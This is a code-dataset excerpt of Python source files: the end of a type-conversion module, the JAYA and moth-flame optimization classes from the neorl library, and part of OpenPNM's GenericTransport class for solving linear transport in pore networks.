if issubclass(orig_t.xtype(), xtype.String):
arg = str_to_tag(arg)
return arg
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractType, coerce):
return _reabs(arg)
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractError, coerce):
return _reabs(arg)
@ovld # noqa: F811
def to_canonical(self, arg, orig_t: AbstractKeywordArgument, coerce):
return arg
#####################
# Convert to output #
#####################
@ovld
def from_canonical(self, res, orig_t: AbstractClassBase):
"""Convert from the canonical representation to the final output."""
if orig_t.tag in (Empty, Cons):
rval = []
while res:
value = self(res[0], orig_t.attributes["head"])
rval.append(value)
res = res[1].value
return rval
tup = tuple(self(x, o) for x, o in zip(res, orig_t.attributes.values()))
return orig_t.constructor(*tup)
@ovld # noqa: F811
def from_canonical(self, res, orig_t: AbstractDict):
tup = tuple(self(x, o) for x, o in zip(res, orig_t.entries.values()))
return dict(zip(orig_t.entries.keys(), tup))
@ovld # noqa: F811
def from_canonical(self, res, orig_t: AbstractTuple):
return tuple(self(x, o) for x, o in zip(res, orig_t.elements))
@ovld # noqa: F811
def from_canonical(self, res, orig_t: AbstractRandomState):
return res
@ovld # noqa: F811
def from_canonical(self, arg, orig_t: AbstractScalar):
if orig_t.xtype() == xtype.String:
arg = _strmap_tag[arg]
return arg
@ovld # noqa: F811
def from_canonical(self, arg, orig_t: AbstractArray):
return orig_t.xtype().from_numpy(arg)
@ovld # noqa: F811
def from_canonical(self, arg, orig_t: AbstractHandle):
# The state is updated by the pipeline through universe.commit()
return arg
@ovld # noqa: F811
def from_canonical(self, arg, orig_t: AbstractUnion):
for typ in orig_t.options:
tag = type_to_tag(typ)
if tag == arg.tag:
return self(arg.value, typ)
else:
raise AssertionError(f"Badly formed TaggedValue")
__consolidate__ = True
__all__ = [
"from_canonical",
"simplify_types",
"str_to_tag",
"to_canonical",
"type_to_tag",
]
``` |
{
"source": "Jimmy-INL/neorl",
"score": 3
} |
#### File: neorl/evolu/jaya.py
```python
import random
import numpy as np
import joblib
class JAYA:
"""
JAYA algorithm
:param mode: (str) problem type, either "min" for minimization problem or "max" for maximization
:param bounds: (dict) input parameter type and lower/upper bounds in dictionary form. Example: ``bounds={'x1': ['int', 1, 4], 'x2': ['float', 0.1, 0.8], 'x3': ['float', 2.2, 6.2]}``
:param fit: (function) the fitness function
:param npop: (int) number of individuals in the population
:param ncores: (int) number of parallel processors
:param seed: (int) random seed for sampling
"""
def __init__(self, mode, bounds, fit, npop=50, ncores=1, seed=None):
self.seed=seed
if self.seed:
random.seed(self.seed)
np.random.seed(self.seed)
assert npop > 3, '--eror: size of npop must be more than 3'
self.npop= npop
self.bounds=bounds
self.ncores=ncores
self.mode=mode
if mode == 'max':
self.fit=fit
elif mode == 'min':
def fitness_wrapper(*args, **kwargs):
return -fit(*args, **kwargs)
self.fit = fitness_wrapper
else:
raise ValueError('--error: The mode entered by user is invalid, use either `min` or `max`')
def gen_indv(self, bounds): # individual
indv = []
for key in bounds:
if bounds[key][0] == 'int':
indv.append(random.randint(bounds[key][1], bounds[key][2]))
elif bounds[key][0] == 'float':
indv.append(random.uniform(bounds[key][1], bounds[key][2]))
elif bounds[key][0] == 'grid':
indv.append(random.sample(bounds[key][1],1)[0])
return indv
def init_population(self, x0=None): # population
pop = []
if x0: # have premary solution
print('The first individual provided by the user:', x0[0])
print('The last individual provided by the user:', x0[-1])
for i in range(len(x0)):
pop.append(x0[i])
else: # random init
for i in range(self.npop):
indv=self.gen_indv(self.bounds)
pop.append(indv)
# array
pop = np.array(pop)
return pop
def ensure_bounds(self, vec): # bounds check
vec_new = []
for i, (key, val) in enumerate(self.bounds.items()):
# less than minimum
if vec[i] < self.bounds[key][1]:
vec_new.append(self.bounds[key][1])
# more than maximum
if vec[i] > self.bounds[key][2]:
vec_new.append(self.bounds[key][2])
# fine
if self.bounds[key][1] <= vec[i] <= self.bounds[key][2]:
vec_new.append(vec[i])
return vec_new
def fit_worker(self, x):
fitness = self.fit(x)
return fitness
def evolute(self, ngen, x0=None, verbose=0):
"""
This function evolutes the MFO algorithm for number of generations.
:param ngen: (int) number of generations to evolute
:param x0: (list of lists) the initial individuals of the population
:param verbose: (bool) print statistics to screen
:return: (dict) dictionary containing major MFO search results
"""
N = self.npop # population size
dim = len(self.bounds) # individual length
if self.seed:
random.seed(self.seed)
np.random.seed(self.seed)
fitness_mat = np.zeros(N)
Best_pos = np.zeros(dim)
Best_score = float('-inf') # find a maximum, so the larger the better
Worst_pos = np.zeros(dim)
Worst_score = float('inf')
## INITIALIZE
# population
if x0:
assert len(x0) == N, '--error: the length of x0 ({}) (initial population) must equal to number of individuals npop ({})'.format(len(x0), self.npop)
pos = self.init_population(x0=x0)
else:
pos = self.init_population()
# calulate fitness
for i in range(N):
fitness = self.fit_worker(pos[i, :])
fitness_mat[i] = fitness
if fitness > Best_score:
Best_score = fitness
Best_pos = pos[i, :]
if fitness < Worst_score:
Worst_score = fitness
Worst_pos = pos[i, :]
## main loop
best_scores = []
for gen in range(1, ngen+1):
new_pos = np.zeros((N,dim))
# update pos
for i in range(N):
r1=np.random.random(dim)
r2=np.random.random(dim)
# Update pos
new_pos[i,:] = (
pos[i,:]
+ r1*(Best_pos - abs(pos[i,:]))
- r2*(Worst_pos - abs(pos[i,:])) # !! minus
)
# check bounds
new_pos[i,:] = self.ensure_bounds(new_pos[i,:])
if self.ncores > 1:
with joblib.Parallel(n_jobs=self.ncores) as parallel:
fitness_new = parallel(joblib.delayed(self.fit_worker)(item) for item in new_pos)
for i in range(N):
if fitness_new[i] > fitness_mat[i]:
pos[i,:] = new_pos[i,:]
fitness_mat[i] = fitness_new[i]
else:
for i in range(N):
# replace current element with new element if it has better fitness
fitness_temp = self.fit_worker(new_pos[i,:])
if fitness_temp > fitness_mat[i]: # better than the old
pos[i,:] = new_pos[i,:]
fitness_mat[i] = fitness_temp
# update best_score and worst_score
for i in range(N):
# new_pos[i,:] = self.ensure_bounds(new_pos[i,:])
if fitness_mat[i] > Best_score:
Best_score = fitness_mat[i]
Best_pos = pos[i, :]
if fitness_mat[i] < Worst_score:
Worst_score = fitness_mat[i]
Worst_pos = pos[i, :]
#-----------------------------
#Fitness saving
#-----------------------------
gen_avg = sum(fitness_mat) / N # current generation avg. fitness
y_best = Best_score # fitness of best individual
x_best = Best_pos # position of the best flame
best_scores.append(y_best)
#--mir show the value wrt min/max
if self.mode=='min':
y_best_correct=-y_best
else:
y_best_correct=y_best
if verbose:
print('************************************************************')
print('JAYA step {}/{}, Ncores={}'.format(gen*self.npop, ngen*self.npop, self.ncores))
print('************************************************************')
print('Best fitness:', np.round(y_best_correct,6))
print('Best individual:', x_best)
print('Average fitness:', np.round(gen_avg,6))
print('************************************************************')
if verbose:
print('------------------------ JAYA Summary --------------------------')
print('Best fitness (y) found:', y_best_correct)
print('Best individual (x) found:', x_best)
print('--------------------------------------------------------------')
if self.mode=='min':
best_scores=[-item for item in best_scores]
return x_best, y_best_correct, best_scores
```
#### File: neorl/evolu/mfo.py
```python
import random
import numpy as np
import math
import joblib
class MFO:
"""
Moth-flame Optimization (MFO)
:param mode: (str) problem type, either "min" for minimization problem or "max" for maximization
:param bounds: (dict) input parameter type and lower/upper bounds in dictionary form. Example: ``bounds={'x1': ['int', 1, 4], 'x2': ['float', 0.1, 0.8], 'x3': ['float', 2.2, 6.2]}``
:param fit: (function) the fitness function
:param nmoths: (int) number of moths in the population
:param b: (float) constant for defining the shape of the logarithmic spiral
:param ncores: (int) number of parallel processors
:param seed: (int) random seed for sampling
"""
def __init__(self, mode, bounds, fit, nmoths=50, b=1, ncores=1, seed=None):
self.seed=seed
if self.seed:
random.seed(self.seed)
np.random.seed(self.seed)
assert nmoths > 3, '--eror: size of nmoths must be more than 3'
self.npop= nmoths
self.bounds=bounds
self.ncores=ncores
self.b=b
self.mode=mode
if mode == 'min':
self.fit=fit
elif mode == 'max':
def fitness_wrapper(*args, **kwargs):
return -fit(*args, **kwargs)
self.fit = fitness_wrapper
else:
raise ValueError('--error: The mode entered by user is invalid, use either `min` or `max`')
def gen_indv(self, bounds): # individual
indv = []
for key in bounds:
if bounds[key][0] == 'int':
indv.append(random.randint(bounds[key][1], bounds[key][2]))
elif bounds[key][0] == 'float':
indv.append(random.uniform(bounds[key][1], bounds[key][2]))
elif bounds[key][0] == 'grid':
indv.append(random.sample(bounds[key][1],1)[0])
return indv
def init_population(self, x0=None): # population
pop = []
if x0: # have premary solution
print('The first individual provided by the user:', x0[0])
print('The last individual provided by the user:', x0[-1])
for i in range(len(x0)):
pop.append(x0[i])
else: # random init
for i in range(self.npop):
indv=self.gen_indv(self.bounds)
pop.append(indv)
# array
pop = np.array(pop)
return pop
def ensure_bounds(self, vec): # bounds check
vec_new = []
for i, (key, val) in enumerate(self.bounds.items()):
# less than minimum
if vec[i] < self.bounds[key][1]:
vec_new.append(self.bounds[key][1])
# more than maximum
if vec[i] > self.bounds[key][2]:
vec_new.append(self.bounds[key][2])
# fine
if self.bounds[key][1] <= vec[i] <= self.bounds[key][2]:
vec_new.append(vec[i])
return vec_new
def fit_worker(self, x):
xchecked=self.ensure_bounds(x)
fitness = self.fit(xchecked)
return fitness
def evolute(self, ngen, x0=None, verbose=0):
"""
This function evolutes the MFO algorithm for number of generations.
:param ngen: (int) number of generations to evolute
:param x0: (list of lists) the initial individuals of the population
:param verbose: (bool) print statistics to screen
:return: (dict) dictionary containing major MFO search results
"""
self.history = {'local_fitness':[], 'global_fitness':[], 'r': []}
self.best_fitness=float("inf")
N = self.npop # population size
dim = len(self.bounds) # individual length
if self.seed:
random.seed(self.seed)
np.random.seed(self.seed)
## INITIALIZE
# moths
if x0:
assert len(x0) == N, '--error: the length of x0 ({}) (initial population) must equal to number of individuals npop ({})'.format(len(x0), self.npop)
Moth_pos = self.init_population(x0=x0)
else:
Moth_pos = self.init_population()
Moth_fitness = np.full(N, float('inf')) # set as worst result
# sort moths
sorted_population = np.copy(Moth_pos)
fitness_sorted = np.zeros(N)
# flames
best_flames = np.copy(Moth_pos)
best_flame_fitness = np.zeros(N)
# moths+flames
double_population = np.zeros((2 * N, dim))
double_fitness = np.zeros(2 * N)
double_sorted_population = np.zeros((2*N, dim))
double_fitness_sorted = np.zeros(2*N)
# previous generation
previous_population = np.zeros((N, dim))
previous_fitness = np.zeros(N)
## main loop
best_scores = []
for gen in range(1, ngen+1):
Flame_no = round(N - gen*((N-1) / (ngen+1)))
if self.ncores > 1:
with joblib.Parallel(n_jobs=self.ncores) as parallel:
Moth_fitness=parallel(joblib.delayed(self.fit_worker)(indv) for indv in Moth_pos) # 2d list
Moth_pos = np.array(Moth_pos)
Moth_fitness = np.array(Moth_fitness)
else:
for i in range(N):
Moth_fitness[i] = self.fit_worker(Moth_pos[i,:])
if gen == 1: # OF # equal to OM #
# sort the moths
fitness_sorted = np.sort(Moth_fitness) # default: (small -> large)
#fitness_sorted = -(np.sort(-np.array(Moth_fitness))) # descend (large -> small)
I = np.argsort(np.array(Moth_fitness)) # index of sorted list
sorted_population = Moth_pos[I, :]
# update flames
best_flames = sorted_population
best_flame_fitness = fitness_sorted
else: # #OF may > #OM
double_population = np.concatenate((previous_population, best_flames), axis=0)
double_fitness = np.concatenate((previous_fitness, best_flame_fitness), axis=0)
double_fitness_sorted = np.sort(double_fitness)
I2 = np.argsort(double_fitness)
double_sorted_population = double_population[I2, :]
fitness_sorted = double_fitness_sorted[0:N]
sorted_population = double_sorted_population[0:N, :]
best_flames = sorted_population
best_flame_fitness = fitness_sorted
# record the best flame so far
Best_flame_score = fitness_sorted[0]
Best_flame_pos = sorted_population[0, :]
# previous
previous_population = np.copy(Moth_pos) # if not using np.copy(),changes of Moth_pos after this code will also change previous_population!
previous_fitness = np.copy(Moth_fitness) # because of the joblib..
# r linearly dicreases from -1 to -2 to calculate t in Eq. (3.12)
r = -1 + gen * ((-1) / ngen)
# update moth position
for i in range(0, N):
for j in range(0,dim):
if i <= Flame_no:
distance_to_flame = abs(sorted_population[i,j]-Moth_pos[i,j])
t = (r-1)*random.random()+1
# eq. (3.12)
Moth_pos[i,j] = (
distance_to_flame*math.exp(self.b*t)*math.cos(t*2*math.pi)
+ sorted_population[i,j]
)
if i > Flame_no:
distance_to_flame = abs(sorted_population[Flame_no,j]-Moth_pos[i,j])
t = (r-1)*random.random()+1
# rebundant moths all fly to the last Flame_no
Moth_pos[i,j] = (
distance_to_flame*math.exp(self.b*t)*math.cos(t*2*math.pi)
+ sorted_population[Flame_no,j]
)
#-----------------------------
#Fitness saving
#-----------------------------
gen_avg = sum(best_flame_fitness) / len(best_flame_fitness) # current generation avg. fitness
y_local_best = Best_flame_score # fitness of best individual
x_local_best = Best_flame_pos # position of the best flame
for i, fits in enumerate(fitness_sorted):
#save the best of the best!!!
if fits < self.best_fitness:
self.best_fitness=fits
self.best_position=sorted_population[i, :].copy()
#--mir
if self.mode=='max':
self.fitness_best_correct=-self.best_fitness
self.local_fitness=-Best_flame_score
else:
self.fitness_best_correct=self.best_fitness
self.local_fitness=Best_flame_score
self.history['local_fitness'].append(self.local_fitness)
self.history['global_fitness'].append(self.fitness_best_correct)
self.history['r'].append(r)
if verbose:
print('************************************************************')
print('MFO step {}/{}, Ncores={}'.format(gen*self.npop, ngen*self.npop, self.ncores))
print('************************************************************')
print('Best fitness:', np.round(self.fitness_best_correct,6))
print('Best individual:', self.best_position)
print('Average fitness:', np.round(gen_avg,6))
print('************************************************************')
if verbose:
print('------------------------ MFO Summary --------------------------')
print('Best fitness (y) found:', self.fitness_best_correct)
print('Best individual (x) found:', self.best_position)
print('--------------------------------------------------------------')
return self.best_position, self.fitness_best_correct, self.history
``` |
{
"source": "Jimmy-INL/OpenPNM",
"score": 2
} |
#### File: openpnm/algorithms/GenericTransport.py
```python
import numpy as np
import openpnm as op
import scipy.sparse.linalg
from numpy.linalg import norm
import scipy.sparse.csgraph as spgr
from scipy.spatial import ConvexHull
from scipy.spatial import cKDTree
from openpnm.topotools import iscoplanar
from openpnm.algorithms import GenericAlgorithm
from openpnm.utils import logging, Docorator, GenericSettings
# Uncomment this line when we stop supporting Python 3.6
# from dataclasses import dataclass, field
# from typing import List
docstr = Docorator()
logger = logging.getLogger(__name__)
@docstr.get_sectionsf('GenericTransportSettings',
sections=['Parameters', 'Other Parameters'])
@docstr.dedent
# Uncomment this line when we stop supporting Python 3.6
# @dataclass
class GenericTransportSettings(GenericSettings):
r"""
Defines the settings for GenericTransport algorithms
Parameters
----------
phase : (str)
The name of the phase on which the algorithm acts
quantity : (str)
The name of the physical quantity to be calculated
conductance : (str)
The name of the pore-scale transport conductance values. These are
typically calculated by a model attached to a *Physics* object
associated with the given *Phase*.
Other Parameters
----------------
solver_family : str (default = 'scipy')
The solver package to use. OpenPNM currently supports ``scipy``,
``pyamg`` and ``petsc`` (if you have it installed).
solver_type : str
The specific solver to use. For instance, if ``solver_family`` is
``scipy`` then you can specify any of the iterative solvers such as
``cg`` or ``gmres``. [More info here]
(https://docs.scipy.org/doc/scipy/reference/sparse.linalg.html),
solver_preconditioner : str (default = ``jacobi``)
This is used by the PETSc solver to specify which preconditioner to
use.
solver_tol : float (default = 1e-6)
Used to control the accuracy to which the iterative solver aims to
achieve before stopping.
solver_atol : float
##
solver_rtol : float
##
solver_maxiter : int (default = 5000)
Limits the number of iterations to attempt before quiting when aiming
for the specified tolerance. The default is 5000.
##
variable_props : list
##
cache_A : bool
##
cache_b : bool
##
"""
phase = None
conductance = None
quantity = None
solver_family = 'scipy'
solver_type = 'spsolve'
solver_preconditioner = 'jacobi'
solver_tol = 1e-8
solver_atol = None
solver_rtol = None
solver_maxiter = 5000
cache_A = True
cache_b = True
@docstr.get_sectionsf('GenericTransport', sections=['Parameters'])
@docstr.dedent
class GenericTransport(GenericAlgorithm):
r"""
This class implements steady-state linear transport calculations
Parameters
----------
%(GenericAlgorithm.parameters)s
Notes
-----
The following table shows the methods that are accessible to the user
for setting up the simulation.
+---------------------+---------------------------------------------------+
| Methods | Description |
+=====================+===================================================+
| ``set_value_BC`` | Applies constant value boundary conditions to the |
| | specified pores |
+---------------------+---------------------------------------------------+
| ``set_rate_BC`` | Applies constant rate boundary conditions to the |
| | specified pores |
+---------------------+---------------------------------------------------+
| ``remove_BC`` | Removes all boundary conditions from the |
| | specified pores |
+---------------------+---------------------------------------------------+
| ``rate`` | Calculates the total rate of transfer through the |
| | given pores or throats |
+---------------------+---------------------------------------------------+
| ``setup`` | A shortcut for applying values in the ``settings``|
| | attribute. |
+---------------------+---------------------------------------------------+
| ``results`` | Returns the results of the calcualtion as a |
| | ``dict`` with the data stored under the 'quantity'|
| | specified in the ``settings`` |
+---------------------+---------------------------------------------------+
In addition to the above methods there are also the following attributes:
+---------------------+---------------------------------------------------+
| Attribute | Description |
+=====================+===================================================+
| ``A`` | Retrieves the coefficient matrix |
+---------------------+---------------------------------------------------+
| ``b`` | Retrieves the RHS matrix |
+---------------------+---------------------------------------------------+
This class contains quite a few hidden methods (preceeded by an
underscore) that are called internally. Since these are critical to the
functioning of this algorithm they are worth outlining even though the
user does not call them directly:
+-----------------------+-------------------------------------------------+
| Method or Attribute | Description |
+=======================+=================================================+
| ``_build_A`` | Builds the **A** matrix based on the |
| | 'conductance' specified in ``settings`` |
+-----------------------+-------------------------------------------------+
| ``_build_b`` | Builds the **b** matrix |
+-----------------------+-------------------------------------------------+
| ``_apply_BCs`` | Applies the given BCs by adjust the **A** and |
| | **b** matrices |
+-----------------------+-------------------------------------------------+
| ``_calc_eff_prop`` | Finds the effective property (e.g. permeability |
| | coefficient) based on the given BCs |
+-----------------------+-------------------------------------------------+
| ``_solve`` | Runs the algorithm using the solver specified |
| | in the ``settings`` |
+-----------------------+-------------------------------------------------+
| ``_get_domain_area`` | Attempts to estimate the area of the inlet pores|
| | if not specified by user |
+-----------------------+-------------------------------------------------+
| ``_get_domain_length``| Attempts to estimate the length between the |
| | inlet and outlet faces if not specified by the |
| | user |
+-----------------------+-------------------------------------------------+
"""
def __init__(self, project=None, network=None, phase=None, settings={},
**kwargs):
# Apply default settings
self.settings._update_settings_and_docs(GenericTransportSettings)
# Overwrite any given in init
self.settings.update(settings)
# Assign phase if given during init
self.setup(phase=phase)
# If network given, get project, otherwise let parent class create it
if network is not None:
project = network.project
super().__init__(project=project, **kwargs)
# Create some instance attributes
self._A = self._pure_A = None
self._b = self._pure_b = None
self['pore.bc_rate'] = np.nan
self['pore.bc_value'] = np.nan
@docstr.get_sectionsf('GenericTransport.setup',
sections=['Parameters'])
@docstr.dedent
def setup(self, phase=None, quantity='', conductance='', **kwargs):
r"""
Parameters
----------
%(GenericTransportSettings.parameters)s
"""
if phase:
self.settings['phase'] = phase.name
if quantity:
self.settings['quantity'] = quantity
if conductance:
self.settings['conductance'] = conductance
self.settings.update(**kwargs)
@docstr.get_full_descriptionf(base='GenericTransport.reset')
@docstr.get_sectionsf(base='GenericTransport.reset',
sections=['Parameters'])
@docstr.dedent
def reset(self, bcs=False, results=True):
r"""
Resets the algorithm to enable re-use.
This allows the reuse of an algorithm inside a for-loop for parametric
studies. The default behavior means that only ``alg.reset()`` and
``alg.run()`` must be called inside a loop. To reset the algorithm
more completely requires overriding the default arguments.
Parameters
----------
results : boolean
If ``True`` (default) all previously calculated values pertaining
to results of the algorithm are removed.
bcs : boolean (default = ``False``)
If ``True`` all previous boundary conditions are removed.
"""
self._pure_b = None
self._b = None
self._pure_A = None
self._A = None
if bcs:
self['pore.bc_value'] = np.nan
self['pore.bc_rate'] = np.nan
if results:
self.pop(self.settings['quantity'], None)
@docstr.dedent
def set_value_BC(self, pores, values, mode='merge'):
r"""
Apply constant value boundary conditons to the specified locations.
These are sometimes referred to as Dirichlet conditions.
Parameters
----------
pores : array_like
The pore indices where the condition should be applied
values : scalar or array_like
The value to apply in each pore. If a scalar is supplied
it is assigne to all locations, and if a vector is applied is
must be the same size as the indices given in ``pores``.
mode : string, optional
Controls how the boundary conditions are applied. Options are:
+-------------+--------------------------------------------------+
| 'merge' | (Default) Adds supplied boundary conditions to |
| | already existing conditions |
+-------------+--------------------------------------------------+
| 'overwrite' | Deletes all boundary condition on object then |
| | adds the given ones |
+-------------+--------------------------------------------------+
Notes
-----
The definition of ``quantity`` is specified in the algorithm's
``settings``, e.g. ``alg.settings['quantity'] = 'pore.pressure'``.
"""
mode = self._parse_mode(mode, allowed=['merge', 'overwrite'],
single=True)
self._set_BC(pores=pores, bctype='value', bcvalues=values,
mode=mode)
def set_rate_BC(self, pores, values, mode='merge'):
r"""
Apply constant rate boundary conditons to the specified locations.
This is similar to a Neumann boundary condition, but is
slightly different since it's the conductance multiplied by the
gradient, while Neumann conditions specify just the gradient.
Parameters
----------
pores : array_like
The pore indices where the condition should be applied
values : scalar or array_like
The values of rate to apply in each pore. If a scalar is supplied
it is assigned to all locations, and if a vector is applied it
must be the same size as the indices given in ``pores``.
mode : string, optional
Controls how the boundary conditions are applied. Options are:
+-------------+--------------------------------------------------+
| 'merge' | (Default) Adds supplied boundary conditions to |
| | already existing conditions |
+-------------+--------------------------------------------------+
| 'overwrite' | Deletes all boundary condition on object then |
| | adds the given ones |
+-------------+--------------------------------------------------+
Notes
-----
The definition of ``quantity`` is specified in the algorithm's
``settings``, e.g. ``alg.settings['quantity'] = 'pore.pressure'``.
"""
mode = self._parse_mode(mode, allowed=['merge', 'overwrite'],
single=True)
self._set_BC(pores=pores, bctype='rate', bcvalues=values, mode=mode)
@docstr.get_sectionsf(base='GenericTransport._set_BC',
sections=['Parameters', 'Notes'])
def _set_BC(self, pores, bctype, bcvalues=None, mode='merge'):
r"""
This private method is called by public facing BC methods, to apply
boundary conditions to specified pores
Parameters
----------
pores : array_like
The pores where the boundary conditions should be applied
bctype : string
Specifies the type or the name of boundary condition to apply. The
types can be one one of the following:
+-------------+--------------------------------------------------+
| 'value' | Specify the value of the quantity in each |
| | location |
+-------------+--------------------------------------------------+
| 'rate' | Specify the flow rate into each location |
+-------------+--------------------------------------------------+
bcvalues : int or array_like
The boundary value to apply, such as concentration or rate. If
a single value is given, it's assumed to apply to all locations.
Different values can be applied to all pores in the form of an
array of the same length as ``pores``.
mode : string, optional
Controls how the boundary conditions are applied. Options are:
+-------------+--------------------------------------------------+
| 'merge' | (Default) Adds supplied boundary conditions to |
| | already existing conditions |
+-------------+--------------------------------------------------+
| 'overwrite' | Deletes all boundary condition on object then |
| | adds the given ones |
+-------------+--------------------------------------------------+
Notes
-----
It is not possible to have multiple boundary conditions for a
specified location in one algorithm. Use ``remove_BCs`` to
clear existing BCs before applying new ones or ``mode='overwrite'``
which removes all existing BC's before applying the new ones.
"""
# Hijack the parse_mode function to verify bctype argument
bctype = self._parse_mode(bctype, allowed=['value', 'rate'],
single=True)
mode = self._parse_mode(mode, allowed=['merge', 'overwrite'],
single=True)
pores = self._parse_indices(pores)
values = np.array(bcvalues)
if values.size > 1 and values.size != pores.size:
raise Exception('The number of boundary values must match the '
+ 'number of locations')
# Warn the user that another boundary condition already exists
value_BC_mask = np.isfinite(self["pore.bc_value"])
rate_BC_mask = np.isfinite(self["pore.bc_rate"])
BC_locs = self.Ps[rate_BC_mask + value_BC_mask]
if np.intersect1d(pores, BC_locs).size:
logger.info('Another boundary condition detected in some locations!')
# Store boundary values
if ('pore.bc_' + bctype not in self.keys()) or (mode == 'overwrite'):
self['pore.bc_' + bctype] = np.nan
if bctype == 'value':
self['pore.bc_' + bctype][pores] = values
if bctype == 'rate':
# Preserve already-assigned rate BCs
bc_rate_current = self.Ps[rate_BC_mask]
intersect = np.intersect1d(bc_rate_current, pores)
self['pore.bc_' + bctype][intersect] += values
# Assign rate BCs to those without previously assigned values
self['pore.bc_' + bctype][np.setdiff1d(pores, intersect)] = values
def remove_BC(self, pores=None, bctype='all'):
r"""
Removes boundary conditions from the specified pores
Parameters
----------
pores : array_like, optional
The pores from which boundary conditions are to be removed. If no
pores are specified, then BCs are removed from all pores. No error
is thrown if the provided pores do not have any BCs assigned.
bctype : string, or list of strings
Specifies which type of boundary condition to remove. Options are:
-*'all'*: (default) Removes all boundary conditions
-*'value'*: Removes only value conditions
-*'rate'*: Removes only rate conditions
"""
if isinstance(bctype, str):
bctype = [bctype]
if 'all' in bctype:
bctype = ['value', 'rate']
if pores is None:
pores = self.Ps
if ('pore.bc_value' in self.keys()) and ('value' in bctype):
self['pore.bc_value'][pores] = np.nan
if ('pore.bc_rate' in self.keys()) and ('rate' in bctype):
self['pore.bc_rate'][pores] = np.nan
def _build_A(self):
r"""
Builds the coefficient matrix based on conductances between pores.
The conductance to use is specified in the algorithm's ``settings``
under ``conductance``. In subclasses (e.g. ``FickianDiffusion``)
this is set by default, though it can be overwritten.
"""
cache_A = self.settings['cache_A']
gvals = self.settings['conductance']
if not gvals:
raise Exception('conductance has not been defined on this algorithm')
if not cache_A:
self._pure_A = None
if self._pure_A is None:
network = self.project.network
phase = self.project.phases()[self.settings['phase']]
g = phase[gvals]
am = network.create_adjacency_matrix(weights=g, fmt='coo')
self._pure_A = spgr.laplacian(am).astype(float)
self.A = self._pure_A.copy()
def _build_b(self):
r"""
Builds the RHS matrix, without applying any boundary conditions or
source terms. This method is trivial an basically creates a column
vector of 0's.
Parameters
----------
force : Boolean (default is ``False``)
If set to ``True`` then the b matrix is built from new. If
``False`` (the default), a cached version of b is returned. The
cached version is *clean* in the sense that no boundary conditions
or sources terms have been added to it.
"""
cache_b = self.settings['cache_b']
if not cache_b:
self._pure_b = None
if self._pure_b is None:
b = np.zeros(shape=self.Np, dtype=float) # Create vector of 0s
self._pure_b = b
self.b = self._pure_b.copy()
def _get_A(self):
if self._A is None:
self._build_A()
return self._A
def _set_A(self, A):
self._A = A
A = property(fget=_get_A, fset=_set_A)
def _get_b(self):
if self._b is None:
self._build_b()
return self._b
def _set_b(self, b):
self._b = b
b = property(fget=_get_b, fset=_set_b)
def _apply_BCs(self):
r"""
Applies all the boundary conditions that have been specified, by
adding values to the *A* and *b* matrices.
"""
if 'pore.bc_rate' in self.keys():
# Update b
ind = np.isfinite(self['pore.bc_rate'])
self.b[ind] = self['pore.bc_rate'][ind]
if 'pore.bc_value' in self.keys():
f = self.A.diagonal().mean()
# Update b (impose bc values)
ind = np.isfinite(self['pore.bc_value'])
self.b[ind] = self['pore.bc_value'][ind] * f
# Update b (substract quantities from b to keep A symmetric)
x_BC = np.zeros_like(self.b)
x_BC[ind] = self['pore.bc_value'][ind]
self.b[~ind] -= (self.A.tocsr() * x_BC)[~ind]
# Update A
P_bc = self.toindices(ind)
indrow = np.isin(self.A.row, P_bc)
indcol = np.isin(self.A.col, P_bc)
self.A.data[indrow] = 0 # Remove entries from A for all BC rows
self.A.data[indcol] = 0 # Remove entries from A for all BC cols
datadiag = self.A.diagonal() # Add diagonal entries back into A
datadiag[P_bc] = np.ones_like(P_bc, dtype=float) * f
self.A.setdiag(datadiag)
self.A.eliminate_zeros() # Remove 0 entries
def run(self, x0=None):
r"""
Builds the A and b matrices, and calls the solver specified in the
``settings`` attribute.
Parameters
----------
x : ND-array
Initial guess of unknown variable
Returns
-------
Nothing is returned...the solution is stored on the objecxt under
``pore.quantity`` where *quantity* is specified in the ``settings``
attribute.
"""
logger.info('―' * 80)
logger.info('Running GenericTransport')
self._run_generic(x0)
def _run_generic(self, x0):
# (Re)build A,b in case phase/physics are updated and alg.run()
# is to be called a second time
self._build_A()
self._build_b()
self._apply_BCs()
if x0 is None:
x0 = np.zeros(self.Np, dtype=float)
x_new = self._solve(x0=x0)
quantity = self.settings['quantity']
self[quantity] = x_new
if not self.settings['quantity']:
raise Exception('quantity has not been defined on this algorithm')
def _solve(self, A=None, b=None, x0=None):
r"""
Sends the A and b matrices to the specified solver, and solves for *x*
given the boundary conditions, and source terms based on the present
value of *x*. This method does NOT iterate to solve for non-linear
source terms or march time steps.
Parameters
----------
A : sparse matrix
The coefficient matrix in sparse format. If not specified, then
it uses the ``A`` matrix attached to the object.
b : ND-array
The RHS matrix in any format. If not specified, then it uses
the ``b`` matrix attached to the object.
x0 : ND-array
The initial guess for the solution of Ax = b
Notes
-----
The solver used here is specified in the ``settings`` attribute of the
algorithm.
"""
# Fetch A and b from self if not given, and throw error if not found
A = self.A if A is None else A
b = self.b if b is None else b
if A is None or b is None:
raise Exception('The A matrix or the b vector not yet built.')
A = A.tocsr()
x0 = np.zeros_like(b) if x0 is None else x0
# Check if A and b are well-defined
self._check_for_nans()
# Raise error if solver_family not available
if self.settings["solver_family"] not in ["scipy", "petsc", "pyamg"]:
raise Exception(f"{self.settings['solver_family']} not available.")
# Set tolerance for iterative solvers
tol = self.settings["solver_tol"]
max_it = self.settings["solver_maxiter"]
atol = self._get_atol()
rtol = self._get_rtol(x0=x0)
# Check if A is symmetric
is_sym = op.utils.is_symmetric(self.A)
if self.settings['solver_type'] == 'cg' and not is_sym:
raise Exception('CG solver only works on symmetric matrices.')
# SciPy
if self.settings['solver_family'] == 'scipy':
# Umfpack by default uses its 32-bit build -> memory overflow
try:
import scikits.umfpack
A.indices = A.indices.astype(np.int64)
A.indptr = A.indptr.astype(np.int64)
except ModuleNotFoundError:
pass
solver = getattr(scipy.sparse.linalg, self.settings['solver_type'])
iterative = ['bicg', 'bicgstab', 'cg', 'cgs', 'gmres', 'lgmres',
'minres', 'gcrotmk', 'qmr']
if solver.__name__ in iterative:
x, exit_code = solver(A=A, b=b, atol=atol, tol=tol, maxiter=max_it, x0=x0)
if exit_code > 0:
raise Exception(f'Solver did not converge, exit code: {exit_code}')
else:
x = solver(A=A, b=b)
# PETSc
if self.settings['solver_family'] == 'petsc':
# Check if petsc is available
try:
import petsc4py
from openpnm.utils.petsc import PETScSparseLinearSolver as SLS
except Exception:
raise ModuleNotFoundError('PETSc is not installed.')
